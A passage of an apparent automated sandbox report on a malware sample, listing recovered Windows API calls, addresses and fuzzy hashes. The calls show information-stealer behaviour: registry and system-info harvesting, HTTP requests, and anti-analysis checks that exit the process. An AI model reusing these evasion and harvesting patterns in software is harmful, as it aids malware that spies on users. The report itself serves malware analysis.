                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • RegQueryValueExA.ADVAPI32(00000000,00880CB0,00000000,000F003F,?,00000400), ref: 004184EC
                                      • lstrlenA.KERNEL32(?), ref: 00418501
                                      • RegQueryValueExA.ADVAPI32(00000000,00880D58,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                      • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                      • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                      • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction ID: 522a35653b5716a3cd8e766be079c84312c0219428d27bb9b95bacca52e49e9d
                                      • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction Fuzzy Hash: A9213BB5D00219ABDF24DFA4E849AED7B75FF44321F108225E925A72D0EB706A05CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0087D958,00000000,00020119,00000000), ref: 004176DD
                                      • RegQueryValueExA.ADVAPI32(00000000,00880E48,00000000,00000000,?,000000FF), ref: 004176FE
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3466090806-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231790B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317912
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 02317944
                                      • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 02317965
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0231796F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: 7f5eeb07a015b0b4550117545beeb311d78d5de014a7f54a4b64366e0bacbc29
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: 7B012CB9A80204BBEB14DBE0DD49FADB7BDEB48701F005154BA0596285D7749944CF51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0087D958,00000000,00020119,004176B9), ref: 0041775B
                                      • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                      • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3466090806-1022791448
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                      APIs
                                      • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                      • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                      • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID: :A$:A
                                      • API String ID: 1378416451-1974578005
                                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023075A1
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02307618
                                      • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02307674
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 023076B9
                                      • HeapFree.KERNEL32(00000000), ref: 023076C0
                                        • Part of subcall function 023094A7: vsprintf_s.MSVCRT ref: 023094C2
                                      • task.LIBCPMTD ref: 023077BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                      • String ID:
                                      • API String ID: 700816787-0
                                      • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction ID: 658c5d83856b4b595ea466a7a20293e3831e529dbab1ab3d86305ba098b4f465
                                      • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction Fuzzy Hash: 51611EB591026C9BDB24DB50CC94FEDB7B9BF48704F0081E9E649A6180DB70ABC5CFA4
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 023064E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02306548
                                        • Part of subcall function 023064E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 0230656A
                                        • Part of subcall function 023064E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0230659C
                                        • Part of subcall function 023064E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023065EC
                                        • Part of subcall function 023064E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02306626
                                        • Part of subcall function 023064E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02306638
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0231557F
                                      • lstrlen.KERNEL32(00000000), ref: 02315596
                                        • Part of subcall function 02319097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023190B9
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 023155CB
                                      • lstrlen.KERNEL32(00000000), ref: 023155EA
                                      • strtok.MSVCRT(00000000,?), ref: 02315605
                                      • lstrlen.KERNEL32(00000000), ref: 02315615
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID:
                                      • API String ID: 3532888709-0
                                      • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction ID: a38e65bbca72456bba359c78329df8dbab4432832b31118be7c1ef94a7ca71a2
                                      • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction Fuzzy Hash: E651E870911248EBCB2CFFA0CEA5AED7B76AF50302F904018E80A665D0EF346B45CF51
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 02317345
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,02317574,004205BD), ref: 02317383
                                      • memset.MSVCRT ref: 023173D1
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02317525
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID:
                                      • API String ID: 224852652-0
                                      • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction ID: 703c15dcf94eef879299660fc6170b970caa9c33fc73ae6b0bc6480b0a48685e
                                      • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction Fuzzy Hash: F95170B0D002189FDB28DBA0DC95BEDF775AF44305F5445A9E109A7181EF746A88CF68
                                      APIs
                                      • memset.MSVCRT ref: 004140D5
                                      • RegOpenKeyExA.ADVAPI32(80000001,00881240,00000000,00020119,?), ref: 004140F4
                                      • RegQueryValueExA.ADVAPI32(?,00881D50,00000000,00000000,00000000,000000FF), ref: 00414118
                                      • RegCloseKey.ADVAPI32(?), ref: 00414122
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                      • lstrcatA.KERNEL32(?,00881E10), ref: 0041415B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                      • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                      APIs
                                      • memset.MSVCRT ref: 0231433C
                                      • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 0231435B
                                      • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 0231437F
                                      • RegCloseKey.ADVAPI32(?), ref: 02314389
                                      • lstrcat.KERNEL32(?,00000000), ref: 023143AE
                                      • lstrcat.KERNEL32(?,0064A168), ref: 023143C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction ID: 9bb5e8aa69a0e0ecd7f0b5b3a5084b41f0134d46feec39f0cd0c7dd3cdc0f98b
                                      • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction Fuzzy Hash: 104187B69401087BDB28EBE0DC95FEE737EAB49700F00455CA729571C0EA7557888FE1
                                      APIs
                                      • strtok_s.MSVCRT ref: 00413588
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • strtok_s.MSVCRT ref: 004136D1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpystrtok_s$lstrlen
                                      • String ID:
                                      • API String ID: 3184129880-0
                                      • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                      • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                      • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                      • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                      APIs
                                      • __lock.LIBCMT ref: 0041B39A
                                        • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                        • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                        • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                                      • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                                        • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                      • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2005412495-0
                                      • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                      • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                                      • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                      • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                      APIs
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02319B08
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02319B21
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02319B39
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02319B51
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02319B6A
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02319B82
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02319B9A
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02319BB3
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02319BCB
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02319BE3
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02319BFC
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02319C14
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02319C2C
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02319C45
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02301437: ExitProcess.KERNEL32 ref: 02301478
                                        • Part of subcall function 023013C7: GetSystemInfo.KERNEL32(?), ref: 023013D1
                                        • Part of subcall function 023013C7: ExitProcess.KERNEL32 ref: 023013E5
                                        • Part of subcall function 02301377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02301392
                                        • Part of subcall function 02301377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02301399
                                        • Part of subcall function 02301377: ExitProcess.KERNEL32 ref: 023013AA
                                        • Part of subcall function 02301487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023014A5
                                        • Part of subcall function 02301487: __aulldiv.LIBCMT ref: 023014BF
                                        • Part of subcall function 02301487: __aulldiv.LIBCMT ref: 023014CD
                                        • Part of subcall function 02301487: ExitProcess.KERNEL32 ref: 023014FB
                                        • Part of subcall function 023169D7: GetUserDefaultLangID.KERNEL32 ref: 023169DB
                                        • Part of subcall function 023013F7: ExitProcess.KERNEL32 ref: 0230142D
                                        • Part of subcall function 02317AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0230141E), ref: 02317AE7
                                        • Part of subcall function 02317AB7: RtlAllocateHeap.NTDLL(00000000), ref: 02317AEE
                                        • Part of subcall function 02317AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02317B06
                                        • Part of subcall function 02317B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02317B77
                                        • Part of subcall function 02317B47: RtlAllocateHeap.NTDLL(00000000), ref: 02317B7E
                                        • Part of subcall function 02317B47: GetComputerNameA.KERNEL32(?,00000104), ref: 02317B96
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02316D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 02316D60
                                      • Sleep.KERNEL32(00001770), ref: 02316D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D81
                                      • ExitProcess.KERNEL32 ref: 02316D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                      • Instruction ID: 3ab6de5d86f77a387fdc52c05506e08cc618eb698421bd49f254d1d447984193
                                      • Instruction Fuzzy Hash: 72312575A41208ABDB2CFBF0DC65BFEB77AAF14302F505519E102A61D0EF749A44CE62
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
